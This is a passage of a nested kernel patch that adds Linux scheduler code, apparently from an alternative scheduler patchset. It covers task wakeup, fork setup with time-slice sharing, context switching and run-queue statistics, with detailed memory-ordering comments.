++		WRITE_ONCE(p->__state, TASK_RUNNING);
++		trace_sched_wakeup(p);
++		goto out;
++	}
++
++	/*
++	 * If we are going to wake up a thread waiting for CONDITION we
++	 * need to ensure that CONDITION=1 done by the caller can not be
++	 * reordered with p->state check below. This pairs with smp_store_mb()
++	 * in set_current_state() that the waiting thread does.
++	 */
++	raw_spin_lock_irqsave(&p->pi_lock, flags);
++	smp_mb__after_spinlock();
++	if (!ttwu_state_match(p, state, &success))
++		goto unlock;
++
++	trace_sched_waking(p);
++
++	/*
++	 * Ensure we load p->on_rq _after_ p->state, otherwise it would
++	 * be possible to, falsely, observe p->on_rq == 0 and get stuck
++	 * in smp_cond_load_acquire() below.
++	 *
++	 * sched_ttwu_pending()			try_to_wake_up()
++	 *   STORE p->on_rq = 1			  LOAD p->state
++	 *   UNLOCK rq->lock
++	 *
++	 * __schedule() (switch to task 'p')
++	 *   LOCK rq->lock			  smp_rmb();
++	 *   smp_mb__after_spinlock();
++	 *   UNLOCK rq->lock
++	 *
++	 * [task p]
++	 *   STORE p->state = UNINTERRUPTIBLE	  LOAD p->on_rq
++	 *
++	 * Pairs with the LOCK+smp_mb__after_spinlock() on rq->lock in
++	 * __schedule().  See the comment for smp_mb__after_spinlock().
++	 *
++	 * A similar smb_rmb() lives in try_invoke_on_locked_down_task().
++	 */
++	smp_rmb();
++	if (READ_ONCE(p->on_rq) && ttwu_runnable(p, wake_flags))
++		goto unlock;
++
++#ifdef CONFIG_SMP
++	/*
++	 * Ensure we load p->on_cpu _after_ p->on_rq, otherwise it would be
++	 * possible to, falsely, observe p->on_cpu == 0.
++	 *
++	 * One must be running (->on_cpu == 1) in order to remove oneself
++	 * from the runqueue.
++	 *
++	 * __schedule() (switch to task 'p')	try_to_wake_up()
++	 *   STORE p->on_cpu = 1		  LOAD p->on_rq
++	 *   UNLOCK rq->lock
++	 *
++	 * __schedule() (put 'p' to sleep)
++	 *   LOCK rq->lock			  smp_rmb();
++	 *   smp_mb__after_spinlock();
++	 *   STORE p->on_rq = 0			  LOAD p->on_cpu
++	 *
++	 * Pairs with the LOCK+smp_mb__after_spinlock() on rq->lock in
++	 * __schedule().  See the comment for smp_mb__after_spinlock().
++	 *
++	 * Form a control-dep-acquire with p->on_rq == 0 above, to ensure
++	 * schedule()'s deactivate_task() has 'happened' and p will no longer
++	 * care about it's own p->state. See the comment in __schedule().
++	 */
++	smp_acquire__after_ctrl_dep();
++
++	/*
++	 * We're doing the wakeup (@success == 1), they did a dequeue (p->on_rq
++	 * == 0), which means we need to do an enqueue, change p->state to
++	 * TASK_WAKING such that we can unlock p->pi_lock before doing the
++	 * enqueue, such as ttwu_queue_wakelist().
++	 */
++	WRITE_ONCE(p->__state, TASK_WAKING);
++
++	/*
++	 * If the owning (remote) CPU is still in the middle of schedule() with
++	 * this task as prev, considering queueing p on the remote CPUs wake_list
++	 * which potentially sends an IPI instead of spinning on p->on_cpu to
++	 * let the waker make forward progress. This is safe because IRQs are
++	 * disabled and the IPI will deliver after on_cpu is cleared.
++	 *
++	 * Ensure we load task_cpu(p) after p->on_cpu:
++	 *
++	 * set_task_cpu(p, cpu);
++	 *   STORE p->cpu = @cpu
++	 * __schedule() (switch to task 'p')
++	 *   LOCK rq->lock
++	 *   smp_mb__after_spin_lock()          smp_cond_load_acquire(&p->on_cpu)
++	 *   STORE p->on_cpu = 1                LOAD p->cpu
++	 *
++	 * to ensure we observe the correct CPU on which the task is currently
++	 * scheduling.
++	 */
++	if (smp_load_acquire(&p->on_cpu) &&
++	    ttwu_queue_wakelist(p, task_cpu(p), wake_flags))
++		goto unlock;
++
++	/*
++	 * If the owning (remote) CPU is still in the middle of schedule() with
++	 * this task as prev, wait until it's done referencing the task.
++	 *
++	 * Pairs with the smp_store_release() in finish_task().
++	 *
++	 * This ensures that tasks getting woken will be fully ordered against
++	 * their previous state and preserve Program Order.
++	 */
++	smp_cond_load_acquire(&p->on_cpu, !VAL);
++
++	sched_task_ttwu(p);
++
++	cpu = select_task_rq(p);
++
++	if (cpu != task_cpu(p)) {
++		if (p->in_iowait) {
++			delayacct_blkio_end(p);
++			atomic_dec(&task_rq(p)->nr_iowait);
++		}
++
++		wake_flags |= WF_MIGRATED;
++		psi_ttwu_dequeue(p);
++		set_task_cpu(p, cpu);
++	}
++#else
++	cpu = task_cpu(p);
++#endif /* CONFIG_SMP */
++
++	ttwu_queue(p, cpu, wake_flags);
++unlock:
++	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++out:
++	if (success)
++		ttwu_stat(p, task_cpu(p), wake_flags);
++	preempt_enable();
++
++	return success;
++}
++
++static bool __task_needs_rq_lock(struct task_struct *p)
++{
++	unsigned int state = READ_ONCE(p->__state);
++
++	/*
++	 * Since pi->lock blocks try_to_wake_up(), we don't need rq->lock when
++	 * the task is blocked. Make sure to check @state since ttwu() can drop
++	 * locks at the end, see ttwu_queue_wakelist().
++	 */
++	if (state == TASK_RUNNING || state == TASK_WAKING)
++		return true;
++
++	/*
++	 * Ensure we load p->on_rq after p->__state, otherwise it would be
++	 * possible to, falsely, observe p->on_rq == 0.
++	 *
++	 * See try_to_wake_up() for a longer comment.
++	 */
++	smp_rmb();
++	if (p->on_rq)
++		return true;
++
++#ifdef CONFIG_SMP
++	/*
++	 * Ensure the task has finished __schedule() and will not be referenced
++	 * anymore. Again, see try_to_wake_up() for a longer comment.
++	 */
++	smp_rmb();
++	smp_cond_load_acquire(&p->on_cpu, !VAL);
++#endif
++
++	return false;
++}
++
++/**
++ * task_call_func - Invoke a function on task in fixed state
++ * @p: Process for which the function is to be invoked, can be @current.
++ * @func: Function to invoke.
++ * @arg: Argument to function.
++ *
++ * Fix the task in it's current state by avoiding wakeups and or rq operations
++ * and call @func(@arg) on it.  This function can use ->on_rq and task_curr()
++ * to work out what the state is, if required.  Given that @func can be invoked
++ * with a runqueue lock held, it had better be quite lightweight.
++ *
++ * Returns:
++ *   Whatever @func returns
++ */
++int task_call_func(struct task_struct *p, task_call_f func, void *arg)
++{
++	struct rq *rq = NULL;
++	struct rq_flags rf;
++	int ret;
++
++	raw_spin_lock_irqsave(&p->pi_lock, rf.flags);
++
++	if (__task_needs_rq_lock(p))
++		rq = __task_rq_lock(p, &rf);
++
++	/*
++	 * At this point the task is pinned; either:
++	 *  - blocked and we're holding off wakeups      (pi->lock)
++	 *  - woken, and we're holding off enqueue       (rq->lock)
++	 *  - queued, and we're holding off schedule     (rq->lock)
++	 *  - running, and we're holding off de-schedule (rq->lock)
++	 *
++	 * The called function (@func) can use: task_curr(), p->on_rq and
++	 * p->__state to differentiate between these states.
++	 */
++	ret = func(p, arg);
++
++	if (rq)
++		__task_rq_unlock(rq, &rf);
++
++	raw_spin_unlock_irqrestore(&p->pi_lock, rf.flags);
++	return ret;
++}
++
++/**
++ * cpu_curr_snapshot - Return a snapshot of the currently running task
++ * @cpu: The CPU on which to snapshot the task.
++ *
++ * Returns the task_struct pointer of the task "currently" running on
++ * the specified CPU.  If the same task is running on that CPU throughout,
++ * the return value will be a pointer to that task's task_struct structure.
++ * If the CPU did any context switches even vaguely concurrently with the
++ * execution of this function, the return value will be a pointer to the
++ * task_struct structure of a randomly chosen task that was running on
++ * that CPU somewhere around the time that this function was executing.
++ *
++ * If the specified CPU was offline, the return value is whatever it
++ * is, perhaps a pointer to the task_struct structure of that CPU's idle
++ * task, but there is no guarantee.  Callers wishing a useful return
++ * value must take some action to ensure that the specified CPU remains
++ * online throughout.
++ *
++ * This function executes full memory barriers before and after fetching
++ * the pointer, which permits the caller to confine this function's fetch
++ * with respect to the caller's accesses to other shared variables.
++ */
++struct task_struct *cpu_curr_snapshot(int cpu)
++{
++	struct task_struct *t;
++
++	smp_mb(); /* Pairing determined by caller's synchronization design. */
++	t = rcu_dereference(cpu_curr(cpu));
++	smp_mb(); /* Pairing determined by caller's synchronization design. */
++	return t;
++}
++
++/**
++ * wake_up_process - Wake up a specific process
++ * @p: The process to be woken up.
++ *
++ * Attempt to wake up the nominated process and move it to the set of runnable
++ * processes.
++ *
++ * Return: 1 if the process was woken up, 0 if it was already running.
++ *
++ * This function executes a full memory barrier before accessing the task state.
++ */
++int wake_up_process(struct task_struct *p)
++{
++	return try_to_wake_up(p, TASK_NORMAL, 0);
++}
++EXPORT_SYMBOL(wake_up_process);
++
++int wake_up_state(struct task_struct *p, unsigned int state)
++{
++	return try_to_wake_up(p, state, 0);
++}
++
++/*
++ * Perform scheduler related setup for a newly forked process p.
++ * p is forked by current.
++ *
++ * __sched_fork() is basic setup used by init_idle() too:
++ */
++static inline void __sched_fork(unsigned long clone_flags, struct task_struct *p)
++{
++	p->on_rq			= 0;
++	p->on_cpu			= 0;
++	p->utime			= 0;
++	p->stime			= 0;
++	p->sched_time			= 0;
++
++#ifdef CONFIG_SCHEDSTATS
++	/* Even if schedstat is disabled, there should not be garbage */
++	memset(&p->stats, 0, sizeof(p->stats));
++#endif
++
++#ifdef CONFIG_PREEMPT_NOTIFIERS
++	INIT_HLIST_HEAD(&p->preempt_notifiers);
++#endif
++
++#ifdef CONFIG_COMPACTION
++	p->capture_control = NULL;
++#endif
++#ifdef CONFIG_SMP
++	p->wake_entry.u_flags = CSD_TYPE_TTWU;
++#endif
++}
++
++/*
++ * fork()/clone()-time setup:
++ */
++int sched_fork(unsigned long clone_flags, struct task_struct *p)
++{
++	__sched_fork(clone_flags, p);
++	/*
++	 * We mark the process as NEW here. This guarantees that
++	 * nobody will actually run it, and a signal or other external
++	 * event cannot wake it up and insert it on the runqueue either.
++	 */
++	p->__state = TASK_NEW;
++
++	/*
++	 * Make sure we do not leak PI boosting priority to the child.
++	 */
++	p->prio = current->normal_prio;
++
++	/*
++	 * Revert to default priority/policy on fork if requested.
++	 */
++	if (unlikely(p->sched_reset_on_fork)) {
++		if (task_has_rt_policy(p)) {
++			p->policy = SCHED_NORMAL;
++			p->static_prio = NICE_TO_PRIO(0);
++			p->rt_priority = 0;
++		} else if (PRIO_TO_NICE(p->static_prio) < 0)
++			p->static_prio = NICE_TO_PRIO(0);
++
++		p->prio = p->normal_prio = p->static_prio;
++
++		/*
++		 * We don't need the reset flag anymore after the fork. It has
++		 * fulfilled its duty:
++		 */
++		p->sched_reset_on_fork = 0;
++	}
++
++#ifdef CONFIG_SCHED_INFO
++	if (unlikely(sched_info_on()))
++		memset(&p->sched_info, 0, sizeof(p->sched_info));
++#endif
++	init_task_preempt_count(p);
++
++	return 0;
++}
++
++void sched_cgroup_fork(struct task_struct *p, struct kernel_clone_args *kargs)
++{
++	unsigned long flags;
++	struct rq *rq;
++
++	/*
++	 * Because we're not yet on the pid-hash, p->pi_lock isn't strictly
++	 * required yet, but lockdep gets upset if rules are violated.
++	 */
++	raw_spin_lock_irqsave(&p->pi_lock, flags);
++	/*
++	 * Share the timeslice between parent and child, thus the
++	 * total amount of pending timeslices in the system doesn't change,
++	 * resulting in more scheduling fairness.
++	 */
++	rq = this_rq();
++	raw_spin_lock(&rq->lock);
++
++	rq->curr->time_slice /= 2;
++	p->time_slice = rq->curr->time_slice;
++#ifdef CONFIG_SCHED_HRTICK
++	hrtick_start(rq, rq->curr->time_slice);
++#endif
++
++	if (p->time_slice < RESCHED_NS) {
++		p->time_slice = sched_timeslice_ns;
++		resched_curr(rq);
++	}
++	sched_task_fork(p, rq);
++	raw_spin_unlock(&rq->lock);
++
++	rseq_migrate(p);
++	/*
++	 * We're setting the CPU for the first time, we don't migrate,
++	 * so use __set_task_cpu().
++	 */
++	__set_task_cpu(p, smp_processor_id());
++	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++}
++
++void sched_post_fork(struct task_struct *p)
++{
++}
++
++#ifdef CONFIG_SCHEDSTATS
++
++DEFINE_STATIC_KEY_FALSE(sched_schedstats);
++
++static void set_schedstats(bool enabled)
++{
++	if (enabled)
++		static_branch_enable(&sched_schedstats);
++	else
++		static_branch_disable(&sched_schedstats);
++}
++
++void force_schedstat_enabled(void)
++{
++	if (!schedstat_enabled()) {
++		pr_info("kernel profiling enabled schedstats, disable via kernel.sched_schedstats.\n");
++		static_branch_enable(&sched_schedstats);
++	}
++}
++
++static int __init setup_schedstats(char *str)
++{
++	int ret = 0;
++	if (!str)
++		goto out;
++
++	if (!strcmp(str, "enable")) {
++		set_schedstats(true);
++		ret = 1;
++	} else if (!strcmp(str, "disable")) {
++		set_schedstats(false);
++		ret = 1;
++	}
++out:
++	if (!ret)
++		pr_warn("Unable to parse schedstats=\n");
++
++	return ret;
++}
++__setup("schedstats=", setup_schedstats);
++
++#ifdef CONFIG_PROC_SYSCTL
++static int sysctl_schedstats(struct ctl_table *table, int write, void *buffer,
++		size_t *lenp, loff_t *ppos)
++{
++	struct ctl_table t;
++	int err;
++	int state = static_branch_likely(&sched_schedstats);
++
++	if (write && !capable(CAP_SYS_ADMIN))
++		return -EPERM;
++
++	t = *table;
++	t.data = &state;
++	err = proc_dointvec_minmax(&t, write, buffer, lenp, ppos);
++	if (err < 0)
++		return err;
++	if (write)
++		set_schedstats(state);
++	return err;
++}
++
++static struct ctl_table sched_core_sysctls[] = {
++	{
++		.procname       = "sched_schedstats",
++		.data           = NULL,
++		.maxlen         = sizeof(unsigned int),
++		.mode           = 0644,
++		.proc_handler   = sysctl_schedstats,
++		.extra1         = SYSCTL_ZERO,
++		.extra2         = SYSCTL_ONE,
++	},
++	{}
++};
++static int __init sched_core_sysctl_init(void)
++{
++	register_sysctl_init("kernel", sched_core_sysctls);
++	return 0;
++}
++late_initcall(sched_core_sysctl_init);
++#endif /* CONFIG_PROC_SYSCTL */
++#endif /* CONFIG_SCHEDSTATS */
++
++/*
++ * wake_up_new_task - wake up a newly created task for the first time.
++ *
++ * This function will do some initial scheduler statistics housekeeping
++ * that must be done for every newly created context, then puts the task
++ * on the runqueue and wakes it.
++ */
++void wake_up_new_task(struct task_struct *p)
++{
++	unsigned long flags;
++	struct rq *rq;
++
++	raw_spin_lock_irqsave(&p->pi_lock, flags);
++	WRITE_ONCE(p->__state, TASK_RUNNING);
++	rq = cpu_rq(select_task_rq(p));
++#ifdef CONFIG_SMP
++	rseq_migrate(p);
++	/*
++	 * Fork balancing, do it here and not earlier because:
++	 * - cpus_ptr can change in the fork path
++	 * - any previously selected CPU might disappear through hotplug
++	 *
++	 * Use __set_task_cpu() to avoid calling sched_class::migrate_task_rq,
++	 * as we're not fully set-up yet.
++	 */
++	__set_task_cpu(p, cpu_of(rq));
++#endif
++
++	raw_spin_lock(&rq->lock);
++	update_rq_clock(rq);
++
++	activate_task(p, rq);
++	trace_sched_wakeup_new(p);
++	check_preempt_curr(rq);
++
++	raw_spin_unlock(&rq->lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++}
++
++#ifdef CONFIG_PREEMPT_NOTIFIERS
++
++static DEFINE_STATIC_KEY_FALSE(preempt_notifier_key);
++
++void preempt_notifier_inc(void)
++{
++	static_branch_inc(&preempt_notifier_key);
++}
++EXPORT_SYMBOL_GPL(preempt_notifier_inc);
++
++void preempt_notifier_dec(void)
++{
++	static_branch_dec(&preempt_notifier_key);
++}
++EXPORT_SYMBOL_GPL(preempt_notifier_dec);
++
++/**
++ * preempt_notifier_register - tell me when current is being preempted & rescheduled
++ * @notifier: notifier struct to register
++ */
++void preempt_notifier_register(struct preempt_notifier *notifier)
++{
++	if (!static_branch_unlikely(&preempt_notifier_key))
++		WARN(1, "registering preempt_notifier while notifiers disabled\n");
++
++	hlist_add_head(&notifier->link, &current->preempt_notifiers);
++}
++EXPORT_SYMBOL_GPL(preempt_notifier_register);
++
++/**
++ * preempt_notifier_unregister - no longer interested in preemption notifications
++ * @notifier: notifier struct to unregister
++ *
++ * This is *not* safe to call from within a preemption notifier.
++ */
++void preempt_notifier_unregister(struct preempt_notifier *notifier)
++{
++	hlist_del(&notifier->link);
++}
++EXPORT_SYMBOL_GPL(preempt_notifier_unregister);
++
++static void __fire_sched_in_preempt_notifiers(struct task_struct *curr)
++{
++	struct preempt_notifier *notifier;
++
++	hlist_for_each_entry(notifier, &curr->preempt_notifiers, link)
++		notifier->ops->sched_in(notifier, raw_smp_processor_id());
++}
++
++static __always_inline void fire_sched_in_preempt_notifiers(struct task_struct *curr)
++{
++	if (static_branch_unlikely(&preempt_notifier_key))
++		__fire_sched_in_preempt_notifiers(curr);
++}
++
++static void
++__fire_sched_out_preempt_notifiers(struct task_struct *curr,
++				   struct task_struct *next)
++{
++	struct preempt_notifier *notifier;
++
++	hlist_for_each_entry(notifier, &curr->preempt_notifiers, link)
++		notifier->ops->sched_out(notifier, next);
++}
++
++static __always_inline void
++fire_sched_out_preempt_notifiers(struct task_struct *curr,
++				 struct task_struct *next)
++{
++	if (static_branch_unlikely(&preempt_notifier_key))
++		__fire_sched_out_preempt_notifiers(curr, next);
++}
++
++#else /* !CONFIG_PREEMPT_NOTIFIERS */
++
++static inline void fire_sched_in_preempt_notifiers(struct task_struct *curr)
++{
++}
++
++static inline void
++fire_sched_out_preempt_notifiers(struct task_struct *curr,
++				 struct task_struct *next)
++{
++}
++
++#endif /* CONFIG_PREEMPT_NOTIFIERS */
++
++static inline void prepare_task(struct task_struct *next)
++{
++	/*
++	 * Claim the task as running, we do this before switching to it
++	 * such that any running task will have this set.
++	 *
++	 * See the smp_load_acquire(&p->on_cpu) case in ttwu() and
++	 * its ordering comment.
++	 */
++	WRITE_ONCE(next->on_cpu, 1);
++}
++
++static inline void finish_task(struct task_struct *prev)
++{
++#ifdef CONFIG_SMP
++	/*
++	 * This must be the very last reference to @prev from this CPU. After
++	 * p->on_cpu is cleared, the task can be moved to a different CPU. We
++	 * must ensure this doesn't happen until the switch is completely
++	 * finished.
++	 *
++	 * In particular, the load of prev->state in finish_task_switch() must
++	 * happen before this.
++	 *
++	 * Pairs with the smp_cond_load_acquire() in try_to_wake_up().
++	 */
++	smp_store_release(&prev->on_cpu, 0);
++#else
++	prev->on_cpu = 0;
++#endif
++}
++
++#ifdef CONFIG_SMP
++
++static void do_balance_callbacks(struct rq *rq, struct balance_callback *head)
++{
++	void (*func)(struct rq *rq);
++	struct balance_callback *next;
++
++	lockdep_assert_held(&rq->lock);
++
++	while (head) {
++		func = (void (*)(struct rq *))head->func;
++		next = head->next;
++		head->next = NULL;
++		head = next;
++
++		func(rq);
++	}
++}
++
++static void balance_push(struct rq *rq);
++
++/*
++ * balance_push_callback is a right abuse of the callback interface and plays
++ * by significantly different rules.
++ *
++ * Where the normal balance_callback's purpose is to be ran in the same context
++ * that queued it (only later, when it's safe to drop rq->lock again),
++ * balance_push_callback is specifically targeted at __schedule().
++ *
++ * This abuse is tolerated because it places all the unlikely/odd cases behind
++ * a single test, namely: rq->balance_callback == NULL.
++ */
++struct balance_callback balance_push_callback = {
++	.next = NULL,
++	.func = balance_push,
++};
++
++static inline struct balance_callback *
++__splice_balance_callbacks(struct rq *rq, bool split)
++{
++	struct balance_callback *head = rq->balance_callback;
++
++	if (likely(!head))
++		return NULL;
++
++	lockdep_assert_rq_held(rq);
++	/*
++	 * Must not take balance_push_callback off the list when
++	 * splice_balance_callbacks() and balance_callbacks() are not
++	 * in the same rq->lock section.
++	 *
++	 * In that case it would be possible for __schedule() to interleave
++	 * and observe the list empty.
++	 */
++	if (split && head == &balance_push_callback)
++		head = NULL;
++	else
++		rq->balance_callback = NULL;
++
++	return head;
++}
++
++static inline struct balance_callback *splice_balance_callbacks(struct rq *rq)
++{
++	return __splice_balance_callbacks(rq, true);
++}
++
++static void __balance_callbacks(struct rq *rq)
++{
++	do_balance_callbacks(rq, __splice_balance_callbacks(rq, false));
++}
++
++static inline void balance_callbacks(struct rq *rq, struct balance_callback *head)
++{
++	unsigned long flags;
++
++	if (unlikely(head)) {
++		raw_spin_lock_irqsave(&rq->lock, flags);
++		do_balance_callbacks(rq, head);
++		raw_spin_unlock_irqrestore(&rq->lock, flags);
++	}
++}
++
++#else
++
++static inline void __balance_callbacks(struct rq *rq)
++{
++}
++
++static inline struct balance_callback *splice_balance_callbacks(struct rq *rq)
++{
++	return NULL;
++}
++
++static inline void balance_callbacks(struct rq *rq, struct balance_callback *head)
++{
++}
++
++#endif
++
++static inline void
++prepare_lock_switch(struct rq *rq, struct task_struct *next)
++{
++	/*
++	 * Since the runqueue lock will be released by the next
++	 * task (which is an invalid locking op but in the case
++	 * of the scheduler it's an obvious special-case), so we
++	 * do an early lockdep release here:
++	 */
++	spin_release(&rq->lock.dep_map, _THIS_IP_);
++#ifdef CONFIG_DEBUG_SPINLOCK
++	/* this is a valid case when another task releases the spinlock */
++	rq->lock.owner = next;
++#endif
++}
++
++static inline void finish_lock_switch(struct rq *rq)
++{
++	/*
++	 * If we are tracking spinlock dependencies then we have to
++	 * fix up the runqueue lock - which gets 'carried over' from
++	 * prev into current:
++	 */
++	spin_acquire(&rq->lock.dep_map, 0, 0, _THIS_IP_);
++	__balance_callbacks(rq);
++	raw_spin_unlock_irq(&rq->lock);
++}
++
++/*
++ * NOP if the arch has not defined these:
++ */
++
++#ifndef prepare_arch_switch
++# define prepare_arch_switch(next)	do { } while (0)
++#endif
++
++#ifndef finish_arch_post_lock_switch
++# define finish_arch_post_lock_switch()	do { } while (0)
++#endif
++
++static inline void kmap_local_sched_out(void)
++{
++#ifdef CONFIG_KMAP_LOCAL
++	if (unlikely(current->kmap_ctrl.idx))
++		__kmap_local_sched_out();
++#endif
++}
++
++static inline void kmap_local_sched_in(void)
++{
++#ifdef CONFIG_KMAP_LOCAL
++	if (unlikely(current->kmap_ctrl.idx))
++		__kmap_local_sched_in();
++#endif
++}
++
++/**
++ * prepare_task_switch - prepare to switch tasks
++ * @rq: the runqueue preparing to switch
++ * @next: the task we are going to switch to.
++ *
++ * This is called with the rq lock held and interrupts off. It must
++ * be paired with a subsequent finish_task_switch after the context
++ * switch.
++ *
++ * prepare_task_switch sets up locking and calls architecture specific
++ * hooks.
++ */
++static inline void
++prepare_task_switch(struct rq *rq, struct task_struct *prev,
++		    struct task_struct *next)
++{
++	kcov_prepare_switch(prev);
++	sched_info_switch(rq, prev, next);
++	perf_event_task_sched_out(prev, next);
++	rseq_preempt(prev);
++	fire_sched_out_preempt_notifiers(prev, next);
++	kmap_local_sched_out();
++	prepare_task(next);
++	prepare_arch_switch(next);
++}
++
++/**
++ * finish_task_switch - clean up after a task-switch
++ * @rq: runqueue associated with task-switch
++ * @prev: the thread we just switched away from.
++ *
++ * finish_task_switch must be called after the context switch, paired
++ * with a prepare_task_switch call before the context switch.
++ * finish_task_switch will reconcile locking set up by prepare_task_switch,
++ * and do any other architecture-specific cleanup actions.
++ *
++ * Note that we may have delayed dropping an mm in context_switch(). If
++ * so, we finish that here outside of the runqueue lock.  (Doing it
++ * with the lock held can cause deadlocks; see schedule() for
++ * details.)
++ *
++ * The context switch have flipped the stack from under us and restored the
++ * local variables which were saved when this task called schedule() in the
++ * past. prev == current is still correct but we need to recalculate this_rq
++ * because prev may have moved to another CPU.
++ */
++static struct rq *finish_task_switch(struct task_struct *prev)
++	__releases(rq->lock)
++{
++	struct rq *rq = this_rq();
++	struct mm_struct *mm = rq->prev_mm;
++	unsigned int prev_state;
++
++	/*
++	 * The previous task will have left us with a preempt_count of 2
++	 * because it left us after:
++	 *
++	 *	schedule()
++	 *	  preempt_disable();			// 1
++	 *	  __schedule()
++	 *	    raw_spin_lock_irq(&rq->lock)	// 2
++	 *
++	 * Also, see FORK_PREEMPT_COUNT.
++	 */
++	if (WARN_ONCE(preempt_count() != 2*PREEMPT_DISABLE_OFFSET,
++		      "corrupted preempt_count: %s/%d/0x%x\n",
++		      current->comm, current->pid, preempt_count()))
++		preempt_count_set(FORK_PREEMPT_COUNT);
++
++	rq->prev_mm = NULL;
++
++	/*
++	 * A task struct has one reference for the use as "current".
++	 * If a task dies, then it sets TASK_DEAD in tsk->state and calls
++	 * schedule one last time. The schedule call will never return, and
++	 * the scheduled task must drop that reference.
++	 *
++	 * We must observe prev->state before clearing prev->on_cpu (in
++	 * finish_task), otherwise a concurrent wakeup can get prev
++	 * running on another CPU and we could rave with its RUNNING -> DEAD
++	 * transition, resulting in a double drop.
++	 */
++	prev_state = READ_ONCE(prev->__state);
++	vtime_task_switch(prev);
++	perf_event_task_sched_in(prev, current);
++	finish_task(prev);
++	tick_nohz_task_switch();
++	finish_lock_switch(rq);
++	finish_arch_post_lock_switch();
++	kcov_finish_switch(current);
++	/*
++	 * kmap_local_sched_out() is invoked with rq::lock held and
++	 * interrupts disabled. There is no requirement for that, but the
++	 * sched out code does not have an interrupt enabled section.
++	 * Restoring the maps on sched in does not require interrupts being
++	 * disabled either.
++	 */
++	kmap_local_sched_in();
++
++	fire_sched_in_preempt_notifiers(current);
++	/*
++	 * When switching through a kernel thread, the loop in
++	 * membarrier_{private,global}_expedited() may have observed that
++	 * kernel thread and not issued an IPI. It is therefore possible to
++	 * schedule between user->kernel->user threads without passing though
++	 * switch_mm(). Membarrier requires a barrier after storing to
++	 * rq->curr, before returning to userspace, so provide them here:
++	 *
++	 * - a full memory barrier for {PRIVATE,GLOBAL}_EXPEDITED, implicitly
++	 *   provided by mmdrop(),
++	 * - a sync_core for SYNC_CORE.
++	 */
++	if (mm) {
++		membarrier_mm_sync_core_before_usermode(mm);
++		mmdrop_sched(mm);
++	}
++	if (unlikely(prev_state == TASK_DEAD)) {
++		/* Task is done with its stack. */
++		put_task_stack(prev);
++
++		put_task_struct_rcu_user(prev);
++	}
++
++	return rq;
++}
++
++/**
++ * schedule_tail - first thing a freshly forked thread must call.
++ * @prev: the thread we just switched away from.
++ */
++asmlinkage __visible void schedule_tail(struct task_struct *prev)
++	__releases(rq->lock)
++{
++	/*
++	 * New tasks start with FORK_PREEMPT_COUNT, see there and
++	 * finish_task_switch() for details.
++	 *
++	 * finish_task_switch() will drop rq->lock() and lower preempt_count
++	 * and the preempt_enable() will end up enabling preemption (on
++	 * PREEMPT_COUNT kernels).
++	 */
++
++	finish_task_switch(prev);
++	preempt_enable();
++
++	if (current->set_child_tid)
++		put_user(task_pid_vnr(current), current->set_child_tid);
++
++	calculate_sigpending();
++}
++
++/*
++ * context_switch - switch to the new MM and the new thread's register state.
++ */
++static __always_inline struct rq *
++context_switch(struct rq *rq, struct task_struct *prev,
++	       struct task_struct *next)
++{
++	prepare_task_switch(rq, prev, next);
++
++	/*
++	 * For paravirt, this is coupled with an exit in switch_to to
++	 * combine the page table reload and the switch backend into
++	 * one hypercall.
++	 */
++	arch_start_context_switch(prev);
++
++	/*
++	 * kernel -> kernel   lazy + transfer active
++	 *   user -> kernel   lazy + mmgrab() active
++	 *
++	 * kernel ->   user   switch + mmdrop() active
++	 *   user ->   user   switch
++	 */
++	if (!next->mm) {                                // to kernel
++		enter_lazy_tlb(prev->active_mm, next);
++
++		next->active_mm = prev->active_mm;
++		if (prev->mm)                           // from user
++			mmgrab(prev->active_mm);
++		else
++			prev->active_mm = NULL;
++	} else {                                        // to user
++		membarrier_switch_mm(rq, prev->active_mm, next->mm);
++		/*
++		 * sys_membarrier() requires an smp_mb() between setting
++		 * rq->curr / membarrier_switch_mm() and returning to userspace.
++		 *
++		 * The below provides this either through switch_mm(), or in
++		 * case 'prev->active_mm == next->mm' through
++		 * finish_task_switch()'s mmdrop().
++		 */
++		switch_mm_irqs_off(prev->active_mm, next->mm, next);
++		lru_gen_use_mm(next->mm);
++
++		if (!prev->mm) {                        // from kernel
++			/* will mmdrop() in finish_task_switch(). */
++			rq->prev_mm = prev->active_mm;
++			prev->active_mm = NULL;
++		}
++	}
++
++	prepare_lock_switch(rq, next);
++
++	/* Here we just switch the register state and the stack. */
++	switch_to(prev, next, prev);
++	barrier();
++
++	return finish_task_switch(prev);
++}
++
++/*
++ * nr_running, nr_uninterruptible and nr_context_switches:
++ *
++ * externally visible scheduler statistics: current number of runnable
++ * threads, total number of context switches performed since bootup.
++ */
++unsigned int nr_running(void)
++{
++	unsigned int i, sum = 0;
++
++	for_each_online_cpu(i)
++		sum += cpu_rq(i)->nr_running;
++
++	return sum;
++}
++
++/*
++ * Check if only the current task is running on the CPU.
++ *
++ * Caution: this function does not check that the caller has disabled
++ * preemption, thus the result might have a time-of-check-to-time-of-use
++ * race.  The caller is responsible to use it correctly, for example:
++ *
++ * - from a non-preemptible section (of course)
++ *
++ * - from a thread that is bound to a single CPU
++ *
++ * - in a loop with very short iterations (e.g. a polling loop)
++ */
++bool single_task_running(void)
++{
++	return raw_rq()->nr_running == 1;
++}
++EXPORT_SYMBOL(single_task_running);
++
++unsigned long long nr_context_switches(void)
++{
++	int i;
++	unsigned long long sum = 0;
++
++	for_each_possible_cpu(i)
++		sum += cpu_rq(i)->nr_switches;
++
++	return sum;
++}
++
++/*
++ * Consumers of these two interfaces, like for example the cpuidle menu
++ * governor, are using nonsensical data. Preferring shallow idle state selection
++ * for a CPU that has IO-wait which might not even end up running the task when
++ * it does become runnable.
++ */
++
++unsigned int nr_iowait_cpu(int cpu)
++{
++	return atomic_read(&cpu_rq(cpu)->nr_iowait);
++}
++
++/*
++ * IO-wait accounting, and how it's mostly bollocks (on SMP).
++ *
++ * The idea behind IO-wait account is to account the idle time that we could
++ * have spend running if it were not for IO. That is, if we were to improve the
++ * storage performance, we'd have a proportional reduction in IO-wait time.
++ *
++ * This all works nicely on UP, where, when a task blocks on IO, we account
++ * idle time as IO-wait, because if the storage were faster, it could've been
++ * running and we'd not be idle.
++ *
++ * This has been extended to SMP, by doing the same for each CPU. This however
++ * is broken.
++ *
++ * Imagine for instance the case where two tasks block on one CPU, only the one
++ * CPU will have IO-wait accounted, while the other has regular idle. Even
++ * though, if the storage were faster, both could've ran at the same time,
++ * utilising both CPUs.
++ *
++ * This means, that when looking globally, the current IO-wait accounting on
++ * SMP is a lower bound, by reason of under accounting.
